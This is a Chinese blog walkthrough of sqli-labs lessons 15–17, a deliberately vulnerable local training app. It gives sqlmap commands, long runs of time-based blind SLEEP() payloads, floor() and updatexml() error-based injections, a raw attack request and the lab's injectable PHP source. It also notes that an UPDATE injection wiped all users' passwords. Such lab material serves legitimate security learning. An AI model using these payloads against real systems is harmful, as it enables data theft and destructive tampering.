【Mysql sql inject】【入门篇】sqli-labs使用 part 3【15-17】
2016-06-04 04:28
731 查看
Less-15- Blind- Boolian Based- String
1)工具用法:
2)手工注入
时间盲注放弃用手工了,这里的语句引用自SQLMAP中测试语句
3)注入点产生代码
Less-16- Blind- Time Based- Double quotes- String
1)工具用法:
2)手工注入
时间盲注放弃用手工了,这里的语句引用自SQLMAP中测试语句
3)注入点产生代码
Less-17 Update Query- Error based - String
1)工具用法:
经验总结:这里我是登录之后,才成功用SQLMAP注入成功。使用的账户与密码为:Dumb
有个不靠谱的地方,用update注入语句输入不慎重会不经意间修改其他正常用户密码数据;security库下的USER表中查看发现所有用户密码被更改为0。。。
工具命令用法:
2)手工注入
经验:这关username加入了过滤函数实际注入点在passwd处;
两种报错注入方法,一种是利用floor报错语句,一种是使用updatexml()报错;
通过floor报错语句如下(SQLMAP中所使用的注入语句):
使用updatexml(),手工注入语句如下:
3)注入点产生代码
1)工具用法:
sqlmap -u "http://127.0.0.1/hacker/sqli-labs-master/Less-15/index.php" --data "uname=111*&passwd=111&submit=Submit" --current-db --threads 10 --batch --technique BEST
2)手工注入
时间盲注放弃用手工了,这里的语句引用自SQLMAP中测试语句
User Name:111' AND (SELECT * FROM (SELECT(SLEEP(3-(IF(ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),1,1))>96,0,3)))))sIak) AND 'MEep'='MEepPassword:111 User Name:111' AND (SELECT * FROM (SELECT(SLEEP(3-(IF(ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),1,1))>112,0,3)))))sIak) AND 'MEep'='MEepPassword:111 User Name:111' AND (SELECT * FROM (SELECT(SLEEP(3-(IF(ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),1,1))>120,0,3)))))sIak) AND 'MEep'='MEepPassword:111 User Name:111' AND (SELECT * FROM (SELECT(SLEEP(3-(IF(ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),1,1))>116,0,3)))))sIak) AND 'MEep'='MEepPassword:111 User Name:111' AND (SELECT * FROM (SELECT(SLEEP(3-(IF(ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),1,1))>114,0,3)))))sIak) AND 'MEep'='MEepPassword:111 User Name:111' AND (SELECT * FROM (SELECT(SLEEP(3-(IF(ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),1,1))>115,0,3)))))sIak) AND 'MEep'='MEepPassword:111 User Name:111' AND (SELECT * FROM (SELECT(SLEEP(3-(IF(ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),1,1))!=115,0,3)))))sIak) AND 'MEep'='MEepPassword:111 User Name:111' AND (SELECT * FROM (SELECT(SLEEP(3-(IF(ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),2,1))>64,0,3)))))sIak) AND 'MEep'='MEepPassword:111 User Name:111' AND (SELECT * FROM (SELECT(SLEEP(3-(IF(ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),2,1))>96,0,3)))))sIak) AND 'MEep'='MEepPassword:111 User Name:111' AND (SELECT * FROM (SELECT(SLEEP(3-(IF(ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),2,1))>112,0,3)))))sIak) AND 'MEep'='MEepPassword:111 User Name:111' AND (SELECT * FROM (SELECT(SLEEP(3-(IF(ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),2,1))>120,0,3)))))sIak) AND 'MEep'='MEepPassword:111 User Name:111' AND (SELECT * FROM (SELECT(SLEEP(3-(IF(ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),2,1))>116,0,3)))))sIak) AND 'MEep'='MEepPassword:111
3)注入点产生代码
if(isset($_POST['uname']) && isset($_POST['passwd']))
{
$uname=$_POST['uname'];
$passwd=$_POST['passwd'];
//logging the connection parameters to a file for analysis.
$fp=fopen('result.txt','a');
fwrite($fp,'User Name:'.$uname);
fwrite($fp,'Password:'.$passwd."\n");
fclose($fp);
// connectivity
@$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);Less-16- Blind- Time Based- Double quotes- String
1)工具用法:
sqlmap -u "http://127.0.0.1/hacker/sqli-labs-master/Less-16/index.php" --data "uname=111*&passwd=111&submit=Submit" --current-db --threads 10 --batch --technique BEST --risk 3 --level 5
2)手工注入
时间盲注放弃用手工了,这里的语句引用自SQLMAP中测试语句
User Name:") AND (SELECT * FROM (SELECT(SLEEP(2-(IF(ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),1,1))>120,0,2)))))cLMQ) AND ("rwXh"="rwXh
Password:111
User Name:") AND (SELECT * FROM (SELECT(SLEEP(2-(IF(ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),1,1))>116,0,2)))))cLMQ) AND ("rwXh"="rwXh
Password:111
User Name:") AND (SELECT * FROM (SELECT(SLEEP(2-(IF(ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),1,1))>114,0,2)))))cLMQ) AND ("rwXh"="rwXh
Password:111
User Name:") AND (SELECT * FROM (SELECT(SLEEP(2-(IF(ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),1,1))>115,0,2)))))cLMQ) AND ("rwXh"="rwXh
Password:111
User Name:") AND (SELECT * FROM (SELECT(SLEEP(2-(IF(ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),1,1))!=115,0,2)))))cLMQ) AND ("rwXh"="rwXh
Password:111
User Name:") AND (SELECT * FROM (SELECT(SLEEP(2-(IF(ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),2,1))>64,0,2)))))cLMQ) AND ("rwXh"="rwXh
Password:111
User Name:") AND (SELECT * FROM (SELECT(SLEEP(2-(IF(ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),2,1))>96,0,2)))))cLMQ) AND ("rwXh"="rwXh
Password:111
User Name:") AND (SELECT * FROM (SELECT(SLEEP(2-(IF(ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),2,1))>112,0,2)))))cLMQ) AND ("rwXh"="rwXh
Password:111
User Name:") AND (SELECT * FROM (SELECT(SLEEP(2-(IF(ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),2,1))>104,0,2)))))cLMQ) AND ("rwXh"="rwXh
Password:111
User Name:") AND (SELECT * FROM (SELECT(SLEEP(2-(IF(ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),2,1))>100,0,2)))))cLMQ) AND ("rwXh"="rwXh
Password:111
User Name:") AND (SELECT * FROM (SELECT(SLEEP(2-(IF(ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),2,1))>102,0,2)))))cLMQ) AND ("rwXh"="rwXh
Password:111
User Name:") AND (SELECT * FROM (SELECT(SLEEP(2-(IF(ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),2,1))>101,0,2)))))cLMQ) AND ("rwXh"="rwXh
Password:111
User Name:") AND (SELECT * FROM (SELECT(SLEEP(2-(IF(ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),2,1))!=101,0,2)))))cLMQ) AND ("rwXh"="rwXh
Password:111
User Name:") AND (SELECT * FROM (SELECT(SLEEP(2-(IF(ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),3,1))>64,0,2)))))cLMQ) AND ("rwXh"="rwXh
Password:111
User Name:") AND (SELECT * FROM (SELECT(SLEEP(2-(IF(ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),3,1))>96,0,2)))))cLMQ) AND ("rwXh"="rwXh
Password:111
User Name:") AND (SELECT * FROM (SELECT(SLEEP(2-(IF(ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),3,1))>112,0,2)))))cLMQ) AND ("rwXh"="rwXh
Password:111
User Name:") AND (SELECT * FROM (SELECT(SLEEP(2-(IF(ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),3,1))>104,0,2)))))cLMQ) AND ("rwXh"="rwXh
Password:111
User Name:") AND (SELECT * FROM (SELECT(SLEEP(2-(IF(ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),3,1))>100,0,2)))))cLMQ) AND ("rwXh"="rwXh
Password:111
User Name:") AND (SELECT * FROM (SELECT(SLEEP(2-(IF(ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),3,1))>98,0,2)))))cLMQ) AND ("rwXh"="rwXh
Password:111
User Name:") AND (SELECT * FROM (SELECT(SLEEP(2-(IF(ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),3,1))>99,0,2)))))cLMQ) AND ("rwXh"="rwXh
Password:111
User Name:") AND (SELECT * FROM (SELECT(SLEEP(2-(IF(ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),3,1))!=99,0,2)))))cLMQ) AND ("rwXh"="rwXh
Password:111
User Name:") AND (SELECT * FROM (SELECT(SLEEP(2-(IF(ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),4,1))>64,0,2)))))cLMQ) AND ("rwXh"="rwXh
Password:111
User Name:") AND (SELECT * FROM (SELECT(SLEEP(2-(IF(ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),4,1))>96,0,2)))))cLMQ) AND ("rwXh"="rwXh
Password:111
User Name:") AND (SELECT * FROM (SELECT(SLEEP(2-(IF(ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),4,1))>112,0,2)))))cLMQ) AND ("rwXh"="rwXh
Password:111
User Name:") AND (SELECT * FROM (SELECT(SLEEP(2-(IF(ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),4,1))>120,0,2)))))cLMQ) AND ("rwXh"="rwXh
Password:111
User Name:") AND (SELECT * FROM (SELECT(SLEEP(2-(IF(ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),4,1))>116,0,2)))))cLMQ) AND ("rwXh"="rwXh
Password:111
User Name:") AND (SELECT * FROM (SELECT(SLEEP(2-(IF(ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),4,1))>118,0,2)))))cLMQ) AND ("rwXh"="rwXh
Password:111
User Name:") AND (SELECT * FROM (SELECT(SLEEP(2-(IF(ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),4,1))>117,0,2)))))cLMQ) AND ("rwXh"="rwXh
Password:111
User Name:") AND (SELECT * FROM (SELECT(SLEEP(2-(IF(ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),4,1))!=117,0,2)))))cLMQ) AND ("rwXh"="rwXh
Password:111
User Name:") AND (SELECT * FROM (SELECT(SLEEP(2-(IF(ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),5,1))>64,0,2)))))cLMQ) AND ("rwXh"="rwXh
Password:111
User Name:") AND (SELECT * FROM (SELECT(SLEEP(2-(IF(ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),5,1))>96,0,2)))))cLMQ) AND ("rwXh"="rwXh
Password:111
User Name:") AND (SELECT * FROM (SELECT(SLEEP(2-(IF(ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),5,1))>112,0,2)))))cLMQ) AND ("rwXh"="rwXh
Password:111
User Name:") AND (SELECT * FROM (SELECT(SLEEP(2-(IF(ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),5,1))>120,0,2)))))cLMQ) AND ("rwXh"="rwXh
Password:111
User Name:") AND (SELECT * FROM (SELECT(SLEEP(2-(IF(ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),5,1))>116,0,2)))))cLMQ) AND ("rwXh"="rwXh
Password:111
User Name:") AND (SELECT * FROM (SELECT(SLEEP(2-(IF(ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),5,1))>114,0,2)))))cLMQ) AND ("rwXh"="rwXh
Password:111
User Name:") AND (SELECT * FROM (SELECT(SLEEP(2-(IF(ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),5,1))>113,0,2)))))cLMQ) AND ("rwXh"="rwXh
Password:111
User Name:") AND (SELECT * FROM (SELECT(SLEEP(2-(IF(ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),5,1))!=114,0,2)))))cLMQ) AND ("rwXh"="rwXh
Password:111
User Name:") AND (SELECT * FROM (SELECT(SLEEP(2-(IF(ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),6,1))>64,0,2)))))cLMQ) AND ("rwXh"="rwXh
Password:111
User Name:") AND (SELECT * FROM (SELECT(SLEEP(2-(IF(ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),6,1))>96,0,2)))))cLMQ) AND ("rwXh"="rwXh
Password:111
User Name:") AND (SELECT * FROM (SELECT(SLEEP(2-(IF(ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),6,1))>112,0,2)))))cLMQ) AND ("rwXh"="rwXh
Password:111
User Name:") AND (SELECT * FROM (SELECT(SLEEP(2-(IF(ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),6,1))>104,0,2)))))cLMQ) AND ("rwXh"="rwXh
Password:111
User Name:") AND (SELECT * FROM (SELECT(SLEEP(2-(IF(ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),6,1))>108,0,2)))))cLMQ) AND ("rwXh"="rwXh
Password:111
User Name:") AND (SELECT * FROM (SELECT(SLEEP(2-(IF(ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),6,1))>106,0,2)))))cLMQ) AND ("rwXh"="rwXh
Password:111
User Name:") AND (SELECT * FROM (SELECT(SLEEP(2-(IF(ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),6,1))>105,0,2)))))cLMQ) AND ("rwXh"="rwXh
Password:111
User Name:") AND (SELECT * FROM (SELECT(SLEEP(2-(IF(ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),6,1))!=105,0,2)))))cLMQ) AND ("rwXh"="rwXh
Password:111
User Name:") AND (SELECT * FROM (SELECT(SLEEP(2-(IF(ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),7,1))>64,0,2)))))cLMQ) AND ("rwXh"="rwXh
Password:111
User Name:") AND (SELECT * FROM (SELECT(SLEEP(2-(IF(ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),7,1))>96,0,2)))))cLMQ) AND ("rwXh"="rwXh
Password:111
User Name:") AND (SELECT * FROM (SELECT(SLEEP(2-(IF(ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),7,1))>112,0,2)))))cLMQ) AND ("rwXh"="rwXh
Password:111
User Name:") AND (SELECT * FROM (SELECT(SLEEP(2-(IF(ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),7,1))>120,0,2)))))cLMQ) AND ("rwXh"="rwXh
Password:111
User Name:") AND (SELECT * FROM (SELECT(SLEEP(2-(IF(ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),7,1))>116,0,2)))))cLMQ) AND ("rwXh"="rwXh
Password:111
User Name:") AND (SELECT * FROM (SELECT(SLEEP(2-(IF(ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),7,1))>114,0,2)))))cLMQ) AND ("rwXh"="rwXh
Password:111
User Name:") AND (SELECT * FROM (SELECT(SLEEP(2-(IF(ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),7,1))>115,0,2)))))cLMQ) AND ("rwXh"="rwXh
Password:111
User Name:") AND (SELECT * FROM (SELECT(SLEEP(2-(IF(ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),7,1))!=116,0,2)))))cLMQ) AND ("rwXh"="rwXh
Password:111
User Name:") AND (SELECT * FROM (SELECT(SLEEP(2-(IF(ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),8,1))>64,0,2)))))cLMQ) AND ("rwXh"="rwXh
Password:111
User Name:") AND (SELECT * FROM (SELECT(SLEEP(2-(IF(ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),8,1))>96,0,2)))))cLMQ) AND ("rwXh"="rwXh
Password:111
User Name:") AND (SELECT * FROM (SELECT(SLEEP(2-(IF(ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),8,1))>112,0,2)))))cLMQ) AND ("rwXh"="rwXh
Password:111
User Name:") AND (SELECT * FROM (SELECT(SLEEP(2-(IF(ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),8,1))>120,0,2)))))cLMQ) AND ("rwXh"="rwXh
Password:111
User Name:") AND (SELECT * FROM (SELECT(SLEEP(2-(IF(ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),8,1))>124,0,2)))))cLMQ) AND ("rwXh"="rwXh
Password:111
User Name:") AND (SELECT * FROM (SELECT(SLEEP(2-(IF(ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),8,1))>122,0,2)))))cLMQ) AND ("rwXh"="rwXh
Password:111
User Name:") AND (SELECT * FROM (SELECT(SLEEP(2-(IF(ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),8,1))>121,0,2)))))cLMQ) AND ("rwXh"="rwXh
Password:111
User Name:") AND (SELECT * FROM (SELECT(SLEEP(2-(IF(ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),8,1))!=121,0,2)))))cLMQ) AND ("rwXh"="rwXh
Password:111
User Name:") AND (SELECT * FROM (SELECT(SLEEP(2-(IF(ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),9,1))>64,0,2)))))cLMQ) AND ("rwXh"="rwXh
Password:111
User Name:") AND (SELECT * FROM (SELECT(SLEEP(2-(IF(ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),9,1))>32,0,2)))))cLMQ) AND ("rwXh"="rwXh
Password:111
User Name:") AND (SELECT * FROM (SELECT(SLEEP(2-(IF(ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),9,1))>16,0,2)))))cLMQ) AND ("rwXh"="rwXh
Password:111
User Name:") AND (SELECT * FROM (SELECT(SLEEP(2-(IF(ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),9,1))>8,0,2)))))cLMQ) AND ("rwXh"="rwXh
Password:111
User Name:") AND (SELECT * FROM (SELECT(SLEEP(2-(IF(ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),9,1))>4,0,2)))))cLMQ) AND ("rwXh"="rwXh
Password:111
User Name:") AND (SELECT * FROM (SELECT(SLEEP(2-(IF(ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),9,1))>2,0,2)))))cLMQ) AND ("rwXh"="rwXh
Password:111
User Name:") AND (SELECT * FROM (SELECT(SLEEP(2-(IF(ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),9,1))>1,0,2)))))cLMQ) AND ("rwXh"="rwXh
Password:1113)注入点产生代码
// take the variables
if(isset($_POST['uname']) && isset($_POST['passwd']))
{
$uname=$_POST['uname'];
$passwd=$_POST['passwd'];
//logging the connection parameters to a file for analysis.
$fp=fopen('result.txt','a');
fwrite($fp,'User Name:'.$uname."\n");
fwrite($fp,'Password:'.$passwd."\n");
fclose($fp);
// connectivity
$uname='"'.$uname.'"';
$passwd='"'.$passwd.'"';
@$sql="SELECT username, password FROM users WHERE username=($uname) and password=($passwd) LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);Less-17 Update Query- Error based - String
1)工具用法:
经验总结:这里我是登录之后,才成功用SQLMAP注入成功。使用的账户与密码为:Dumb
有个不靠谱的地方,用update注入语句输入不慎重会不经意间修改其他正常用户密码数据;security库下的USER表中查看发现所有用户密码被更改为0。。。
工具命令用法:
sqlmap -u "http://127.0.0.1/hacker/sqli-labs-master/Less-17/index.php" --data "uname=Dumb&passwd=Dumb&submit=Submit" --current-db --batch --threads 10
2)手工注入
经验:这关username加入了过滤函数实际注入点在passwd处;
两种报错注入方法,一种是利用floor报错语句,一种是使用updatexml()报错;
通过floor报错语句如下(SQLMAP中所使用的注入语句):
User Name:'Dumb' New Password:Dumb' AND (SELECT 8824 FROM(SELECT COUNT(*),CONCAT(0x716a6b7671,(语句),0x716b7a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'noKL'='noKL
使用updatexml(),手工注入语句如下:
POST /hacker/sqli-labs-master/Less-17/index.php HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 88 uname=admin1&passwd=' and updatexml(1,concat(0x7e,(select database())),1)#&submit=Submit
3)注入点产生代码
function check_input($value)
{
if(!empty($value))
{
// truncation (see comments)
$value = substr($value,0,15);
}
// Stripslashes if magic quotes enabled
if (get_magic_quotes_gpc())
{
$value = stripslashes($value);
}
// Quote if not a number
if (!ctype_digit($value))
{
$value = "'" . mysql_real_escape_string($value) . "'";
}
else
{
$value = intval($value);
}
return $value;
}
// take the variables
if(isset($_POST['uname']) && isset($_POST['passwd']))
{
//making sure uname is not injectable
$uname=check_input($_POST['uname']);
$passwd=$_POST['passwd'];
//logging the connection parameters to a file for analysis.
$fp=fopen('result.txt','a');
fwrite($fp,'User Name:'.$uname."\n");
fwrite($fp,'New Password:'.$passwd."\n");
fclose($fp);
// connectivity
@$sql="SELECT username, password FROM users WHERE username= $uname LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
//echo $row;
if($row)
{
//echo '<font color= "#0000ff">';
$row1 = $row['username'];
//echo 'Your Login name:'. $row1;
$update="UPDATE users SET password = '$passwd' WHERE username='$row1'";
mysql_query($update);
echo "<br>";
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 
相关文章推荐
- mssql数据迁移到mysql
- mysql索引和分表
- 最全的mysql查询语句整理
- MySQL查询语句大全集锦
- mysql远程访问速度慢的解决方案
- mysql免密码登陆
- mysql优化
- Mysql命令
- servlet向mysql插入中文时乱码解决
- MySQL学习笔记之十:使用mysql-proxy实现MySQL读写分离
- Mysql关闭与启动
- mysql 5.7源码 启动监听过程
- mysql主从复制配置(精简版)
- mysql主从复制原理
- mysql zip 免安装版 安装教程
- windows远程连接mysql 以及10060错误
- 2、.getcom.mchange.v2.c3p0.impl.NewProxyConnection cannot becast to com.mysql.jdbc.Connection
- mysql 入门基础(4)—约束和视图
- mysql 创建函数 error Code: 1227. Access denied;
- mysql 创建函数 error Code: 1227. Access denied;